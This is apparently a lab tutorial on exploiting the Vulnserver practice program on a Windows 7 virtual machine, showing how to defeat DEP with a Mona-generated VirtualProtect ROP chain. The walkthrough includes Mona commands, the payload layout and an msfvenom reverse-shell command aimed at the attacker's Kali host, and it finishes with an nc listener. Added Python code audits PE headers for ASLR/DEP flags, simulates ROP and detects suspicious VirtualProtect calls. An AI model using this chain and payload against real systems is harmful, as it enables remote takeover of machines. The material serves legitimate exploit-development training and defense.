Buffer Overflow - Defeating Data Execution Prevention (DEP) With Return-Oriented Programming (ROP)


In a buffer overflow, Return-Oriented Programming (ROP) can be used to defeat Data Execution Prevention (DEP). DEP prevents code injected onto the stack from executing (and ASLR, where a module opts in, randomizes where that module loads), hence the use of tiny pieces of existing Windows DLL code ("gadgets") to construct a program that turns DEP off.

Tools needed:

Basic Python scripts

Immunity Debugger

MONA plug-in for Immunity Debugger (copy it into the Immunity folder)

Metasploit Framework/Kali attack machine

Windows 7 victim machine

Getting started:

On the Windows 7 machine, turn off your firewall, then double-click the Vulnserver executable to start it; the application opens as shown below.



Test the connection to Vulnserver from your Kali machine using netcat:
nc 192.168.229.133 9999 (replace the IP with your Windows 7 machine's IP)



Attach Vulnserver to Immunity Debugger.
Next, test code execution.

We will send an attack that puts the address of a JMP ESP instruction (625011af) into EIP, so that execution continues at the location ESP points to. JMP ESP is found with MONA in Immunity: at the bottom of the Immunity window, execute the command below in the white bar. ff e4 is the machine code for JMP ESP, and essfunc.dll is the module that shows "False" in both the Rebase and ASLR columns of the !mona modules output.

!mona find -s "\xff\xe4" -m essfunc.dll
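The Rebase/ASLR and NXCompat columns that Mona reports come from two opt-in bits in the module's PE header. As an added example (not code from the original post or from Mona), here is a small Python check that reads those bits, DYNAMIC_BASE and NX_COMPAT in the optional header's DllCharacteristics field, so you can audit which DLLs shipped with your own software lack ASLR and DEP opt-in. The header layout and flag values are from the PE format; the build_fake_pe helper constructs a minimal, non-loadable header purely for demonstration, and audit_file is how you would point the check at a real file such as essfunc.dll.

```python
import struct

# DllCharacteristics flags from the PE optional header (values from the PE spec)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image opts in to ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image opts in to DEP


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics word of a PE image held in memory."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # The optional header follows the 4-byte signature and the 20-byte COFF header.
    opt = e_lfanew + 4 + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 0x46 of the optional header in both formats.
    return struct.unpack_from("<H", image, opt + 0x46)[0]


def mitigations(image: bytes) -> dict:
    """Report whether the image opts in to ASLR and DEP, like Mona's module table."""
    dc = dll_characteristics(image)
    return {
        "aslr": bool(dc & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dc & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def build_fake_pe(characteristics: int) -> bytes:
    """Constructed minimal PE header (not a loadable image) with the given DllCharacteristics."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine=i386, 1 section, SizeOfOptionalHeader=0xE0, DLL characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 0x46, characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def audit_file(path: str) -> dict:
    """Audit a real DLL or EXE on disk, e.g. audit_file('essfunc.dll')."""
    with open(path, "rb") as f:
        return mitigations(f.read())


if __name__ == "__main__":
    legacy = build_fake_pe(0)  # looks like essfunc.dll in the Mona table: no ASLR, no DEP
    hardened = build_fake_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
                             | IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
    print("legacy  :", mitigations(legacy))
    print("hardened:", mitigations(hardened))
```

A module that reports aslr=False loads at the same address on every boot, which is why its JMP ESP address can be hard-coded in the attack; relinking it with /DYNAMICBASE and /NXCOMPAT (or the MinGW equivalents) removes that property.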



For testing purposes, we put NOP instructions ('\x90', No Operation) followed by an INT 3 instruction ('\xCC'), a software breakpoint that interrupts processing. If this works, the program will stop at the '\xCC' instruction.

On your Kali Linux machine, in a Terminal window, execute the code below:



The lower left corner of the Immunity window should show "INT 3 command". In the upper right pane of Immunity, left-click the value to the right of ESP so it's highlighted in blue, then click "Follow in Dump". The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte. This works: we are able to inject code onto the stack and execute it!



Turn on DEP.

On the Windows 7 desktop, click Start, right-click Computer, and click Properties. Then click Advanced System Settings, the Advanced tab, and in the Performance section click the Settings button. In the Performance Options box, click the Data Execution Prevention tab, then select the option that turns on DEP.



Restart Vulnserver and Immunity, then run the JMP ESP code again. The lower left corner of the Immunity window should say "Access violation", as shown below, which means you cannot execute code on the stack because DEP is turned on.



In Return-Oriented Programming (ROP), we use pieces of code that already exist in the process ("gadgets"), each just a few machine-language instructions followed by a RETN, and chain them together to turn off DEP. To turn off DEP, we can use any of the following functions: VirtualAlloc(), HeapCreate(), SetProcessDEPPolicy(), NtSetInformationProcess(), VirtualProtect(), or WriteProcessMemory().
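To make the mechanism concrete, here is an added toy ROP simulator in Python; it is not code from the post or from Mona, and its gadget addresses, register set and micro-instructions are all constructed. It shows the two points above: control flow is driven entirely by addresses popped off the stack, so the CPU only ever executes bytes inside an executable image, which is why DEP blocks the JMP ESP approach (control lands on the stack) but not a chain of gadgets. It also shows the trick that "-cp nonull" chains rely on: loading a negative constant and negating it to obtain a small value like 0x40 (PAGE_EXECUTE_READWRITE) without placing null bytes in the packet.

```python
import struct

# Constructed toy gadget library: address -> micro-instructions. The addresses
# are made up to resemble a non-ASLR module's range; they are not real gadgets.
MODULE = range(0x62500000, 0x62510000)   # the only executable region in this toy
POP_EAX_RET     = 0x62501111
POP_EBX_RET     = 0x62501222
ADD_EAX_EBX_RET = 0x62501333
NEG_EAX_RET     = 0x62501444
GADGETS = {
    POP_EAX_RET:     [("pop", "eax"), ("ret",)],
    POP_EBX_RET:     [("pop", "ebx"), ("ret",)],
    ADD_EAX_EBX_RET: [("add", "eax", "ebx"), ("ret",)],
    NEG_EAX_RET:     [("neg", "eax"), ("ret",)],
}
CHAIN_END = 0xFFFFFFFF   # sentinel standing in for the final call into VirtualProtect()
STACK = 0x0018FF10       # an address on the (non-executable) stack


class DEPViolation(Exception):
    """Raised when control lands on an address that is not inside an executable image."""


def run_chain(words, dep=True):
    """Drive the toy CPU with a ROP chain. `words` is the list of dwords that
    overwrote the stack, starting with the value that replaces the saved EIP.
    Returns the final registers, or (with DEP off) the address control escaped to."""
    regs = {"eax": 0, "ebx": 0}
    esp = 0
    eip = words[esp]; esp += 1           # the overflowed function's RETN
    while eip != CHAIN_END:
        if eip not in MODULE:
            if dep:
                raise DEPViolation("0x%08x is not in an executable image" % eip)
            return {"jumped_to": eip, **regs}   # what the JMP ESP test relied on
        for insn in GADGETS[eip]:
            if insn[0] == "pop":
                regs[insn[1]] = words[esp]; esp += 1
            elif insn[0] == "add":
                regs[insn[1]] = (regs[insn[1]] + regs[insn[2]]) & 0xFFFFFFFF
            elif insn[0] == "neg":
                regs[insn[1]] = (-regs[insn[1]]) & 0xFFFFFFFF
            elif insn[0] == "ret":
                eip = words[esp]; esp += 1   # next gadget address comes from the stack
    return regs


def pack_chain(words):
    """Serialize the chain as little-endian dwords, as the struct-based code in
    rop_chains.txt does."""
    return b"".join(struct.pack("<I", w) for w in words)


def has_null(chain_bytes):
    """A null byte would terminate the string the server copies, truncating the chain."""
    return b"\x00" in chain_bytes


# Three ways to leave 0x40 in EAX. The direct constant contains null bytes;
# the other two avoid them, which is what Mona's -cp nonull option enforces.
DIRECT    = [POP_EAX_RET, 0x00000040, CHAIN_END]
NEG_WAY   = [POP_EAX_RET, 0xFFFFFFC0, NEG_EAX_RET, CHAIN_END]
ADD_WAY   = [POP_EAX_RET, 0x11111111, POP_EBX_RET, 0xEEEEEF2F, ADD_EAX_EBX_RET, CHAIN_END]

if __name__ == "__main__":
    for name, chain in (("direct", DIRECT), ("neg", NEG_WAY), ("add", ADD_WAY)):
        print(name, hex(run_chain(chain)["eax"]), "nulls:", has_null(pack_chain(chain)))
    try:
        run_chain([STACK])            # returning into the stack with DEP on
    except DEPViolation as e:
        print("DEP blocked it:", e)
    print("DEP off:", run_chain([STACK], dep=False))
```

The simulator never executes anything that is not a gadget: every value the chain consumes is data on the stack, and the only code that runs is code the module already contains. That is exactly why DEP, which only controls which pages are executable, does not stop a chain whose last step asks the OS to make the stack page executable.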

Building a ROP Chain with MONA

In Immunity, at the bottom white bar type the below command then hit the Enter key:

!mona rop -m *.dll -cp nonull

MONA goes through all the DLLs and constructs chains of useful gadgets, shown in the Log data window below.

Log data is accessed via View > Log data. The output is also written to the rop_chains.txt file in the Immunity Debugger folder.



The VirtualProtect() ROP Chain

In the rop_chains.txt file, find the "Register Setup for VirtualProtect()" section, shown in the image below. The chain loads all those values into the registers, i.e. it places the function's parameters on the stack, and then calls the function's address before landing back on our NOP sled.
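From the defender's side, the register setup above ends in a single observable event: VirtualProtect() being asked to make a page on the current thread's stack executable. As an added example (not from the post), here is a small Python detector that runs over constructed API-hook trace lines and flags VirtualProtect calls that grant execute permission on a stack page or on memory that belongs to no loaded image. The trace format, thread stack ranges and module ranges are all made up for the example; a real EDR or sandbox would supply its own, and PAGE_EXECUTE_READWRITE (0x40) is the value the VirtualProtect chain requests.

```python
import re

# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}

# Constructed API-hook trace (not real tool output); one call per line.
TRACE = """\
tid=0x5a0 api=VirtualAlloc address=0x00420000 size=0x1000 protect=0x04
tid=0x5a0 api=VirtualProtect address=0x0018ff40 size=0x201 protect=0x40
tid=0x5a0 api=VirtualProtect address=0x6250a000 size=0x1000 protect=0x02
tid=0x5a4 api=VirtualProtect address=0x00420000 size=0x1000 protect=0x40
"""

# Constructed per-thread stack ranges and loaded-module ranges: (start, end).
STACKS = {0x5a0: (0x0018d000, 0x00190000), 0x5a4: (0x00290000, 0x00293000)}
MODULES = {"vulnserver.exe": (0x00400000, 0x00407000),
           "essfunc.dll": (0x62500000, 0x62508000)}

LINE_RE = re.compile(
    r"tid=(0x[0-9a-f]+) api=(\w+) address=(0x[0-9a-f]+) "
    r"size=(0x[0-9a-f]+) protect=(0x[0-9a-f]+)"
)


def parse_line(line):
    """Turn one trace line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    tid, api, addr, size, prot = m.groups()
    return {"tid": int(tid, 16), "api": api, "address": int(addr, 16),
            "size": int(size, 16), "protect": int(prot, 16)}


def in_range(addr, rng):
    return rng[0] <= addr < rng[1]


def classify(call, stacks, modules):
    """Return a reason string if the call is a suspicious protection change."""
    if call["api"] != "VirtualProtect" or call["protect"] not in EXECUTABLE_PROTECTIONS:
        return None
    stack = stacks.get(call["tid"])
    if stack and in_range(call["address"], stack):
        return "stack page made executable"
    if not any(in_range(call["address"], rng) for rng in modules.values()):
        return "non-image memory made executable"
    return None


def find_suspicious(trace, stacks=STACKS, modules=MODULES):
    """Scan a trace and return (tid, address, reason) for each flagged call."""
    alerts = []
    for line in trace.splitlines():
        call = parse_line(line)
        if call is None:
            continue
        reason = classify(call, stacks, modules)
        if reason:
            alerts.append((call["tid"], call["address"], reason))
    return alerts


if __name__ == "__main__":
    for tid, addr, reason in find_suspicious(TRACE):
        print("tid=0x%x address=0x%08x: %s" % (tid, addr, reason))
```

The first rule is the direct signature of the chain this page builds: the lpAddress it passes is the stack page holding the NOP sled, so the protection change lands inside the calling thread's own stack range. The second rule catches the same idea applied to heap or VirtualAlloc'd memory; JIT compilers do this legitimately, so in practice it is a lower-severity signal that needs process context.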



Inserting the Python ROP Code to the Attack:

Inside the rop_chains.txt file there is Python code for the ROP chain, shown below, ready to use in the attack. Copy it and add it to the attack script.





Add the rop_chain to the attack script in place of eip, and add the two libraries "struct" and "sys" to the import statement at the beginning of the attack script.



Next, make the program executable (chmod +x), restart both Vulnserver and Immunity, then run the attack script. In the upper right pane of Immunity, click on ESP so it's highlighted in blue, then right-click and choose "Follow in Dump". The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte. This shows that the ROP chain turned off DEP for the stack region, and therefore the code we added to the stack executed.



Create the Exploit Code:

Restart Vulnserver and Immunity. Use msfvenom to create the exploit code, replacing the IP address with your Kali Linux IP.

msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST="192.168.229.130" LPORT=443 EXITFUNC=thread -b '\x00' -f python

(x64 is for 64-bit platforms, x86 is for 32-bit. Note that Vulnserver itself is a 32-bit process and the ROP chain above was built from 32-bit gadgets, so the payload architecture has to match the process, not the host OS. The -b '\x00' option excludes null bytes for the same reason the chain was built with -cp nonull.)



Change the attack line in the code to:

padding = 'F' * (3000 - 2006 - len(rop_chain) - 16 - len(shellcode))
attack = prefix + rop_chain + nopsled + shellcode + padding

Make the program executable, start an nc listener, and run the script; you now have control of Vulnserver on the Windows 7 machine.


Comments

  1. Hello Mister, I have a question: is it possible to avoid DEP through a hooked DLL inside an exe? I have a game that was built around 2002... in XP it worked perfectly, but in W7 it requires DEP and not all the users know how to add it to the whitelist. I already tried this https://pastebin.com/f7e315887 and it didn't work.
